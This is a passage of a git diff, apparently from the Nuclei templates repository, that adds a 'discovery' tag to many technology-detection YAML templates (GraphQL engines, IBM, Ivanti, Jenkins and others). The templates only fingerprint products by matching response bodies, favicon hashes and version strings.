a/http/technologies/graphql/graphql-flutter-detect.yaml +++ b/http/technologies/graphql/graphql-flutter-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,flutter + tags: tech,graphql,flutter,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-go-detect.yaml b/http/technologies/graphql/graphql-go-detect.yaml index 9f5b16ffecc..dfd5f247743 100644 --- a/http/technologies/graphql/graphql-go-detect.yaml +++ b/http/technologies/graphql/graphql-go-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,go + tags: tech,graphql,go,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-gqlgen-detect.yaml b/http/technologies/graphql/graphql-gqlgen-detect.yaml index dde3ff0bccb..c5f37a51798 100644 --- a/http/technologies/graphql/graphql-gqlgen-detect.yaml +++ b/http/technologies/graphql/graphql-gqlgen-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,gqlgen + tags: tech,graphql,gqlgen,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-graphene-detect.yaml b/http/technologies/graphql/graphql-graphene-detect.yaml index 4d84e607bc9..97a7b04555d 100644 --- a/http/technologies/graphql/graphql-graphene-detect.yaml +++ b/http/technologies/graphql/graphql-graphene-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,graphene + tags: tech,graphql,graphene,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-hasura-detect.yaml b/http/technologies/graphql/graphql-hasura-detect.yaml index 2fc89b657b5..2ecd342b2b8 100644 --- a/http/technologies/graphql/graphql-hasura-detect.yaml +++ b/http/technologies/graphql/graphql-hasura-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,hasura + tags: tech,graphql,hasura,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-hypergraphql-detect.yaml b/http/technologies/graphql/graphql-hypergraphql-detect.yaml index e192b89ace4..25d2f044aba 100644 --- a/http/technologies/graphql/graphql-hypergraphql-detect.yaml +++ b/http/technologies/graphql/graphql-hypergraphql-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,hypergraphql + tags: tech,graphql,hypergraphql,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-java-detect.yaml b/http/technologies/graphql/graphql-java-detect.yaml index 1cd42a8baaf..5c024857136 100644 --- a/http/technologies/graphql/graphql-java-detect.yaml +++ b/http/technologies/graphql/graphql-java-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,java + tags: tech,graphql,java,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-juniper-detect.yaml b/http/technologies/graphql/graphql-juniper-detect.yaml index 3154e88a6c3..5c3ff63b417 100644 --- a/http/technologies/graphql/graphql-juniper-detect.yaml +++ b/http/technologies/graphql/graphql-juniper-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,juniper + tags: tech,graphql,juniper,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-php-detect.yaml b/http/technologies/graphql/graphql-php-detect.yaml index f4c25c735de..00fa3e63ef5 100644 --- a/http/technologies/graphql/graphql-php-detect.yaml +++ b/http/technologies/graphql/graphql-php-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,php + tags: tech,graphql,php,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-ruby-detect.yaml b/http/technologies/graphql/graphql-ruby-detect.yaml index 240683b1eed..7504c7d7db0 100644 --- a/http/technologies/graphql/graphql-ruby-detect.yaml +++ b/http/technologies/graphql/graphql-ruby-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,ruby + tags: tech,graphql,ruby,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-sangria-detect.yaml b/http/technologies/graphql/graphql-sangria-detect.yaml index cb88d577d8b..393b33f7b29 100644 --- a/http/technologies/graphql/graphql-sangria-detect.yaml +++ b/http/technologies/graphql/graphql-sangria-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,sangria + tags: tech,graphql,sangria,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-strawberry-detect.yaml b/http/technologies/graphql/graphql-strawberry-detect.yaml index 0b3b7c4a92b..9a42985e327 100644 --- a/http/technologies/graphql/graphql-strawberry-detect.yaml +++ b/http/technologies/graphql/graphql-strawberry-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,strawberry + tags: tech,graphql,strawberry,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-tartiflette-detect.yaml b/http/technologies/graphql/graphql-tartiflette-detect.yaml index b54199d1de3..263182b13f5 100644 --- a/http/technologies/graphql/graphql-tartiflette-detect.yaml +++ b/http/technologies/graphql/graphql-tartiflette-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,tartiflette + tags: tech,graphql,tartiflette,discovery http: - method: POST diff --git a/http/technologies/graphql/graphql-wpgraphql-detect.yaml b/http/technologies/graphql/graphql-wpgraphql-detect.yaml index 52e75f79b8a..b61fd0a2659 100644 --- a/http/technologies/graphql/graphql-wpgraphql-detect.yaml +++ b/http/technologies/graphql/graphql-wpgraphql-detect.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: info reference: https://github.com/dolevf/graphw00f/blob/main/graphw00f/lib.py - tags: tech,graphql,wordpress + tags: tech,graphql,wordpress,discovery http: - method: POST diff --git a/http/technologies/grav-cms-detect.yaml b/http/technologies/grav-cms-detect.yaml index dc4c19ef40b..f7abcaf3d82 100644 --- a/http/technologies/grav-cms-detect.yaml +++ b/http/technologies/grav-cms-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/getgrav/grav metadata: max-request: 1 - tags: tech,grav,cms + tags: tech,grav,cms,discovery http: - method: GET diff --git a/http/technologies/graylog-api-browser.yaml b/http/technologies/graylog-api-browser.yaml index b088ff8a746..26836d3ab95 100644 --- a/http/technologies/graylog-api-browser.yaml +++ b/http/technologies/graylog-api-browser.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,graylog + tags: tech,graylog,discovery http: - method: GET diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml index e1bd8939589..3935414a074 100644 --- a/http/technologies/graylog/graylog-api-exposure.yaml +++ b/http/technologies/graylog/graylog-api-exposure.yaml @@ -17,7 +17,7 @@ info: vendor: graylog product: graylog shodan-query: Graylog - tags: tech,graylog,api,swagger,fuzz + tags: tech,graylog,api,swagger,fuzz,discovery http: - method: GET diff --git a/http/technologies/gunicorn-detect.yaml b/http/technologies/gunicorn-detect.yaml index 2e6d10a7e2a..51229d9aa67 100644 --- a/http/technologies/gunicorn-detect.yaml +++ b/http/technologies/gunicorn-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/benoitc/gunicorn metadata: max-request: 1 - tags: tech,gunicorn + tags: tech,gunicorn,discovery http: - method: GET diff --git a/http/technologies/hanwang-detect.yaml b/http/technologies/hanwang-detect.yaml index cd852d340da..a7540a800ac 100644 --- a/http/technologies/hanwang-detect.yaml +++ b/http/technologies/hanwang-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: 汉王人脸考勤管理系统 - tags: hanwang,tech + tags: hanwang,tech,discovery http: - method: GET diff --git a/http/technologies/harbor-detect.yaml b/http/technologies/harbor-detect.yaml index 500ea08db6f..f3050f822d9 100644 --- a/http/technologies/harbor-detect.yaml +++ b/http/technologies/harbor-detect.yaml @@ -14,7 +14,7 @@ info: product: harbor vendor: linuxfoundation fofa-query: icon_hash=657337228 - tags: tech,harbor + tags: tech,harbor,discovery http: - method: GET diff --git a/http/technologies/hashicorp-boundary-detect.yaml b/http/technologies/hashicorp-boundary-detect.yaml index 525662accdf..675e14a53b5 100644 --- a/http/technologies/hashicorp-boundary-detect.yaml +++ b/http/technologies/hashicorp-boundary-detect.yaml @@ -7,7 +7,7 @@ info: description: Detects HashiCorp Boundary metadata: max-request: 1 - tags: tech,hashicorp + tags: tech,hashicorp,discovery http: - method: GET diff --git a/http/technologies/hashicorp-vault-detect.yaml b/http/technologies/hashicorp-vault-detect.yaml index f954fb90a1c..dd4751216ce 100644 --- a/http/technologies/hashicorp-vault-detect.yaml +++ b/http/technologies/hashicorp-vault-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://developer.hashicorp.com/vault metadata: max-request: 2 - tags: tech,hashicorp + tags: tech,hashicorp,discovery http: - method: GET diff --git a/http/technologies/hcpanywhere-detect.yaml b/http/technologies/hcpanywhere-detect.yaml index 0e7aa3ddf56..9337d944874 100644 --- a/http/technologies/hcpanywhere-detect.yaml +++ b/http/technologies/hcpanywhere-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: icon_hash="915499123" - tags: tech,hcpanywhere + tags: tech,hcpanywhere,discovery http: - method: GET diff --git a/http/technologies/herokuapp-detect.yaml b/http/technologies/herokuapp-detect.yaml index 4bc650db79a..127079ae6f7 100644 --- a/http/technologies/herokuapp-detect.yaml +++ b/http/technologies/herokuapp-detect.yaml @@ -7,7 +7,7 @@ info: description: Detected endpoints might be vulnerable to subdomain takeover or disclose sensitive info metadata: max-request: 1 - tags: heroku,tech + tags: heroku,tech,discovery http: - method: GET diff --git a/http/technologies/hetzner-cloud-detect.yaml b/http/technologies/hetzner-cloud-detect.yaml index 2d124ff8f5b..a3aa395149d 100644 --- a/http/technologies/hetzner-cloud-detect.yaml +++ b/http/technologies/hetzner-cloud-detect.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Hetzner Cloud" - tags: tech,hetzner + tags: tech,hetzner,discovery http: - method: GET diff --git a/http/technologies/hikvision-detect.yaml b/http/technologies/hikvision-detect.yaml index 9ae0cd036d2..22e17419e6d 100644 --- a/http/technologies/hikvision-detect.yaml +++ b/http/technologies/hikvision-detect.yaml @@ -11,7 +11,7 @@ info: product: ds-2cd2026g2-iu\/sl_firmware vendor: hikvision fofa-query: icon_hash=999357577 - tags: tech,hikvision + tags: tech,hikvision,discovery http: - method: GET diff --git a/http/technologies/honeypot-detect.yaml b/http/technologies/honeypot-detect.yaml index 5ab25e9eda9..e5cf454b89f 100644 --- a/http/technologies/honeypot-detect.yaml +++ b/http/technologies/honeypot-detect.yaml @@ -10,7 +10,7 @@ info: - https://github.com/zema1/yarx metadata: max-request: 1 - tags: honeypot,tech,cti + tags: honeypot,tech,cti,discovery variables: rand1: "{{randstr}}" rand2: "{{rand_int(11111, 99999)}}" diff --git a/http/technologies/hp-blade-admin-detect.yaml b/http/technologies/hp-blade-admin-detect.yaml index 4d6400e59d1..da399e086d3 100644 --- a/http/technologies/hp-blade-admin-detect.yaml +++ b/http/technologies/hp-blade-admin-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HP BladeSystem" - tags: panel,hp,tech + tags: panel,hp,tech,discovery http: - method: GET diff --git a/http/technologies/hp-media-vault-detect.yaml b/http/technologies/hp-media-vault-detect.yaml index 1cad5038a21..9805214f42e 100644 --- a/http/technologies/hp-media-vault-detect.yaml +++ b/http/technologies/hp-media-vault-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: 'app="HP-Media-Vault-Media-Server"' - tags: tech,hp + tags: tech,hp,discovery http: - method: GET diff --git a/http/technologies/hubble-detect.yaml b/http/technologies/hubble-detect.yaml index 90dd04f1626..a8f433c9a21 100644 --- a/http/technologies/hubble-detect.yaml +++ b/http/technologies/hubble-detect.yaml @@ -1,30 +1,30 @@ -id: hubble-detect - -info: - name: Hubble - Detect - author: righettod - severity: info - description: | - Hubble products was detected. - reference: - - https://github.com/cilium/hubble - - https://docs.cilium.io/en/stable/observability/hubble/ - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"Hubble UI" - tags: tech,hubble,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>hubble ui enterprise", "<title>hubble ui")' +id: hubble-detect + +info: + name: Hubble - Detect + author: righettod + severity: info + description: | + Hubble products was detected. + reference: + - https://github.com/cilium/hubble + - https://docs.cilium.io/en/stable/observability/hubble/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Hubble UI" + tags: tech,hubble,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>hubble ui enterprise", "<title>hubble ui")' condition: and # digest: 4a0a00473045022100928812848ec77fc943b53dc323555f62016b7f635e8e00a804ae08ab1df8237802203189fec8fbdffa6fc31a83034441ed78e005b0fac0f965ad18d38a1cec50d5b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/hue-wireless-lighting.yaml b/http/technologies/hue-wireless-lighting.yaml index c3112a4b163..2000e575f8b 100644 --- a/http/technologies/hue-wireless-lighting.yaml +++ b/http/technologies/hue-wireless-lighting.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Hue Personal" - tags: tech,hue,iot + tags: tech,hue,iot,discovery http: - method: GET diff --git a/http/technologies/hugegraph-detect.yaml b/http/technologies/hugegraph-detect.yaml index 377317d7638..36b6ff5cdb9 100644 --- a/http/technologies/hugegraph-detect.yaml +++ b/http/technologies/hugegraph-detect.yaml @@ -1,32 +1,32 @@ -id: hugegraph-detect - -info: - name: HugeGraph - Detect - author: rxerium - severity: info - description: | - A huge graph technology was detected. - reference: - - https://hugegraph.apache.org/ - metadata: - max-request: 1 - verified: true - shodan-query: html:"https://hugegraph.github.io" - tags: hugegraph,tech,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"service":"hugegraph"' - - - type: status - status: +id: hugegraph-detect + +info: + name: HugeGraph - Detect + author: rxerium + severity: info + description: | + A huge graph technology was detected. + reference: + - https://hugegraph.apache.org/ + metadata: + max-request: 1 + verified: true + shodan-query: html:"https://hugegraph.github.io" + tags: hugegraph,tech,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"service":"hugegraph"' + + - type: status + status: - 200 # digest: 490a0046304402205a65c44effab00639650362e1dc17003e8f8c8fe0906f0034a45d9891171e72402205ccad0d8d1b79ce0fbf2d6cdf8e64357751e647630c9d21d651ef8096c761587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/hugegraph-studio-detect.yaml b/http/technologies/hugegraph-studio-detect.yaml index bbd0c097229..35083070215 100644 --- a/http/technologies/hugegraph-studio-detect.yaml +++ b/http/technologies/hugegraph-studio-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: app="HugeGraph-Studio" - tags: hugegraph,studio,detect,tech + tags: hugegraph,studio,detect,tech,discovery http: - method: GET diff --git a/http/technologies/hugo-detect.yaml b/http/technologies/hugo-detect.yaml index d62a2791938..54018a76ca9 100644 --- a/http/technologies/hugo-detect.yaml +++ b/http/technologies/hugo-detect.yaml @@ -13,7 +13,7 @@ info: vendor: gohugo product: hugo shodan-query: http.html:'Hugo' - tags: tech,hugo + tags: tech,hugo,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-api-connect-developer-portal-detect.yaml b/http/technologies/ibm/ibm-api-connect-developer-portal-detect.yaml index b061ba3e180..ada82320081 100644 --- a/http/technologies/ibm/ibm-api-connect-developer-portal-detect.yaml +++ b/http/technologies/ibm/ibm-api-connect-developer-portal-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:"801517258" - tags: tech,ibm,detect + tags: tech,ibm,detect,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-decision-runner.yaml b/http/technologies/ibm/ibm-decision-runner.yaml index 73db3916445..3c507830a38 100644 --- a/http/technologies/ibm/ibm-decision-runner.yaml +++ b/http/technologies/ibm/ibm-decision-runner.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: ibm,detect,tech,ibm-decision-runner + tags: ibm,detect,tech,ibm-decision-runner,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-decision-server-runtime.yaml b/http/technologies/ibm/ibm-decision-server-runtime.yaml index 2b942ec9656..6da50556cb8 100644 --- a/http/technologies/ibm/ibm-decision-server-runtime.yaml +++ b/http/technologies/ibm/ibm-decision-server-runtime.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: ibm,detect,tech,decision-server + tags: ibm,detect,tech,decision-server,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-http-server.yaml b/http/technologies/ibm/ibm-http-server.yaml index 32c3ae5ca04..703f66ce66c 100644 --- a/http/technologies/ibm/ibm-http-server.yaml +++ b/http/technologies/ibm/ibm-http-server.yaml @@ -11,7 +11,7 @@ info: vendor: ibm product: http_server shodan-query: http.title:"IBM-HTTP-Server" - tags: tech,ibm + tags: tech,ibm,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-odm-detect.yaml b/http/technologies/ibm/ibm-odm-detect.yaml index 03cacdbc757..a727fc586dc 100644 --- a/http/technologies/ibm/ibm-odm-detect.yaml +++ b/http/technologies/ibm/ibm-odm-detect.yaml @@ -16,7 +16,7 @@ info: vendor: ibm product: operational_decision_manager fofa-query: "icon_hash=\"707491698\"" - tags: ibm,decision-center,tech,detect + tags: ibm,decision-center,tech,detect,discovery http: - method: GET diff --git a/http/technologies/ibm/ibm-spectrum-detect.yaml b/http/technologies/ibm/ibm-spectrum-detect.yaml index 9763bcb755c..bca09c0370d 100644 --- a/http/technologies/ibm/ibm-spectrum-detect.yaml +++ b/http/technologies/ibm/ibm-spectrum-detect.yaml @@ -1,39 +1,39 @@ -id: ibm-spectrum-detect - -info: - name: IBM Spectrum - Detect - author: righettod - severity: info - description: | - IBM Spectrum products was detected. - reference: - - https://www.ibm.com/docs/en/products?filter=spectrum - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"IBM Spectrum" - tags: tech,ibm,spectrum - -http: - - method: GET - path: - - "{{BaseURL}}/" - - "{{BaseURL}}/BACLIENT" - - "{{BaseURL}}/JNLP" - - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "ibm spectrum", "com.ibm.")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '(?i)"guiVersion"\s*:\s*"([0-9.\-]+)"' +id: ibm-spectrum-detect + +info: + name: IBM Spectrum - Detect + author: righettod + severity: info + description: | + IBM Spectrum products was detected. + reference: + - https://www.ibm.com/docs/en/products?filter=spectrum + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"IBM Spectrum" + tags: tech,ibm,spectrum,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/BACLIENT" + - "{{BaseURL}}/JNLP" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "ibm spectrum", "com.ibm.")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)"guiVersion"\s*:\s*"([0-9.\-]+)"' - '(?i)name="?version"?\s+value="?([0-9.\-]+)"?' # digest: 490a00463044022010b8735b11538a61ebad0cfba485cc69dcb6eb93bef26c12d51320b01fcbbafa0220757b61b2bd6bda7c231619e6924892451ff923212f0523a2104a20e213d6d1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ibm/ibm-sterling-detect.yaml b/http/technologies/ibm/ibm-sterling-detect.yaml index 23b1dc364af..e56350df62c 100644 --- a/http/technologies/ibm/ibm-sterling-detect.yaml +++ b/http/technologies/ibm/ibm-sterling-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,sterling,ibm + tags: tech,sterling,ibm,discovery http: - method: GET diff --git a/http/technologies/icecast-mediaserver-detect.yaml b/http/technologies/icecast-mediaserver-detect.yaml index 3f732e21fee..28e8c526515 100644 --- a/http/technologies/icecast-mediaserver-detect.yaml +++ b/http/technologies/icecast-mediaserver-detect.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Icecast Streaming Media Server" product: icecast vendor: xiph - tags: tech,icecast,media-server,detect + tags: tech,icecast,media-server,detect,discovery http: - method: GET diff --git a/http/technologies/icecast-server-detect.yaml b/http/technologies/icecast-server-detect.yaml index 42c4b43cace..2a45199dc0b 100644 --- a/http/technologies/icecast-server-detect.yaml +++ b/http/technologies/icecast-server-detect.yaml @@ -12,7 +12,7 @@ info: vendor: xiph product: icecast shodan-query: http.title:"Icecast Streaming Media Server" - tags: tech,icecast + tags: tech,icecast,discovery http: - method: GET diff --git a/http/technologies/identity-server-v3-detect.yaml b/http/technologies/identity-server-v3-detect.yaml index 882c7e6317e..3f235137987 100644 --- a/http/technologies/identity-server-v3-detect.yaml +++ b/http/technologies/identity-server-v3-detect.yaml @@ -16,7 +16,7 @@ info: vendor: wso2 product: identity_server shodan-query: http.title:"IdentityServer v3" - tags: tech,identityserver,detect + tags: tech,identityserver,detect,discovery http: - method: GET diff --git a/http/technologies/ilo-detect.yaml b/http/technologies/ilo-detect.yaml index 96faf1fc2d2..fac99010d0c 100644 --- a/http/technologies/ilo-detect.yaml +++ b/http/technologies/ilo-detect.yaml @@ -7,7 +7,7 @@ info: description: Version of HP iLO metadata: max-request: 1 - tags: tech,ilo + tags: tech,ilo,discovery http: - method: GET diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index a926e863228..c5a906e4180 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -16,7 +16,7 @@ info: vendor: evilmartians product: imgproxy shodan-query: html:"imgproxy" - tags: imgproxy,tech,detect + tags: imgproxy,tech,detect,discovery http: - method: GET diff --git a/http/technologies/impresscms-detect.yaml b/http/technologies/impresscms-detect.yaml index 76f99d6cabd..bd3f0aed2f6 100644 --- a/http/technologies/impresscms-detect.yaml +++ b/http/technologies/impresscms-detect.yaml @@ -8,7 +8,7 @@ info: - https://github.com/ImpressCMS metadata: max-request: 1 - tags: tech,impresscms + tags: tech,impresscms,discovery http: - method: GET diff --git a/http/technologies/influxdb-version-detect.yaml b/http/technologies/influxdb-version-detect.yaml index 8e0f9f1e52e..3892ed3f65f 100644 --- a/http/technologies/influxdb-version-detect.yaml +++ b/http/technologies/influxdb-version-detect.yaml @@ -19,7 +19,7 @@ info: shodan-query: "X-Influxdb-" product: influxdb vendor: influxdata - tags: tech,influxdb,api + tags: tech,influxdb,api,discovery http: - method: GET diff --git a/http/technologies/interactsh-server.yaml b/http/technologies/interactsh-server.yaml index 29c63a5cee3..1980a027bdc 100644 --- a/http/technologies/interactsh-server.yaml +++ b/http/technologies/interactsh-server.yaml @@ -12,7 +12,7 @@ info: vendor: projectdiscovery product: interactsh shodan-query: http.html:"Interactsh Server" - tags: tech,interactsh + tags: tech,interactsh,discovery http: - method: GET diff --git a/http/technologies/intercom.yaml b/http/technologies/intercom.yaml index d09e328b120..9f885b4403c 100644 --- a/http/technologies/intercom.yaml +++ b/http/technologies/intercom.yaml @@ -7,7 +7,7 @@ info: reference: https://www.intercom.com metadata: max-request: 1 - tags: intercom,tech + tags: intercom,tech,discovery http: - method: GET diff --git a/http/technologies/iparapheur-detect.yaml b/http/technologies/iparapheur-detect.yaml index 668773c1acb..a7ae1545916 100644 --- a/http/technologies/iparapheur-detect.yaml +++ b/http/technologies/iparapheur-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1383463717 - tags: iparapheur,detect,tech + tags: iparapheur,detect,tech,discovery http: - method: GET diff --git a/http/technologies/iplanet-web-server.yaml b/http/technologies/iplanet-web-server.yaml index cce2c1b38b0..ea5296aa84b 100644 --- a/http/technologies/iplanet-web-server.yaml +++ b/http/technologies/iplanet-web-server.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" - tags: tech,webserver + tags: tech,webserver,discovery http: - method: GET diff --git a/http/technologies/ispyconnect-detect.yaml b/http/technologies/ispyconnect-detect.yaml index db13047f52b..2a076090930 100644 --- a/http/technologies/ispyconnect-detect.yaml +++ b/http/technologies/ispyconnect-detect.yaml @@ -12,7 +12,7 @@ info: vendor: ispyconnect product: ispy shodan-query: http.html:"iSpy" - tags: tech,ispy + tags: tech,ispy,discovery http: - method: GET diff --git a/http/technologies/ivanti-epm-detect.yaml b/http/technologies/ivanti-epm-detect.yaml index 948a7d732ce..613135cddc5 100644 --- a/http/technologies/ivanti-epm-detect.yaml +++ b/http/technologies/ivanti-epm-detect.yaml @@ -1,28 +1,28 @@ -id: ivanti-epm-detect - -info: - name: Ivanti Endpoint Manager (EPM) - Detect - author: rxerium - severity: info - description: | - An Ivanti Endpoint Manager was detected. - reference: - - https://www.ivanti.com/en-gb/products/endpoint-manager - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:362091310 - tags: detect,ivanti,emm,tech,mobileiron,epm - -http: - - method: GET - path: - - "{{BaseURL}}/favicon.ico" - - "{{BaseURL}}/images/favicon.ico" - - stop-at-first-match: true - matchers: - - type: dsl - dsl: +id: ivanti-epm-detect + +info: + name: Ivanti Endpoint Manager (EPM) - Detect + author: rxerium + severity: info + description: | + An Ivanti Endpoint Manager was detected. + reference: + - https://www.ivanti.com/en-gb/products/endpoint-manager + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:362091310 + tags: detect,ivanti,emm,tech,mobileiron,epm,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: - "status_code==200 && (\"362091310\" == mmh3(base64_py(body)))" # digest: 490a0046304402204b33c059e22793211a673de3b78b2efd3776ad3741ef28d9980b60c8a52351910220634429280f26b1c977781c208c1544a35ca97bbf2709db481c5c4026f46b0515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ivanti/ivanti-endpoint-manager.yaml b/http/technologies/ivanti/ivanti-endpoint-manager.yaml index b94777ff3ec..1b2a84de0c1 100644 --- a/http/technologies/ivanti/ivanti-endpoint-manager.yaml +++ b/http/technologies/ivanti/ivanti-endpoint-manager.yaml @@ -15,7 +15,7 @@ info: verified: true shodan-query: html:"LANDesk" fofa-query: body="LANDesk" - tags: tech,ivanti,epm,detect,landdesk + tags: tech,ivanti,epm,detect,landdesk,discovery http: - method: GET diff --git a/http/technologies/jboss-detect.yaml b/http/technologies/jboss-detect.yaml index b13895cc3a2..3fba844a770 100644 --- a/http/technologies/jboss-detect.yaml +++ b/http/technologies/jboss-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,jboss + tags: tech,jboss,discovery http: - method: GET diff --git a/http/technologies/jeecg-boot-detect.yaml b/http/technologies/jeecg-boot-detect.yaml index a5f16f7280a..f51aa6c9d78 100644 --- a/http/technologies/jeecg-boot-detect.yaml +++ b/http/technologies/jeecg-boot-detect.yaml @@ -13,7 +13,7 @@ info: vendor: jeecg product: jeecg_boot fofa-query: title="Jeecg-Boot" - tags: jeecg-boot,tech + tags: jeecg-boot,tech,discovery http: - method: GET diff --git a/http/technologies/jellyfin-detect.yaml b/http/technologies/jellyfin-detect.yaml index aec9910163a..70b38a5b3a4 100644 --- a/http/technologies/jellyfin-detect.yaml +++ b/http/technologies/jellyfin-detect.yaml @@ -12,7 +12,7 @@ info: vendor: jellyfin product: jellyfin shodan-query: http.html:"Jellyfin" - tags: tech,jellyfin + tags: tech,jellyfin,discovery http: - method: GET diff --git a/http/technologies/jenkins-detect.yaml b/http/technologies/jenkins-detect.yaml index fe4f886cff2..9657cf7650a 100644 --- a/http/technologies/jenkins-detect.yaml +++ b/http/technologies/jenkins-detect.yaml @@ -20,7 +20,7 @@ info: - product:"jenkins" category: devops fofa-query: icon_hash=81586312 - tags: tech,jenkins,detect + tags: tech,jenkins,detect,discovery http: - method: GET diff --git a/http/technologies/jhipster-detect.yaml b/http/technologies/jhipster-detect.yaml index 7fbddeb9c6a..2d23a9fe353 100644 --- a/http/technologies/jhipster-detect.yaml +++ b/http/technologies/jhipster-detect.yaml @@ -12,7 +12,7 @@ info: vendor: jhipster product: jhipster shodan-query: http.html:"JHipster" - tags: tech,jhipster + tags: tech,jhipster,discovery http: - method: GET diff --git a/http/technologies/jira-detect.yaml 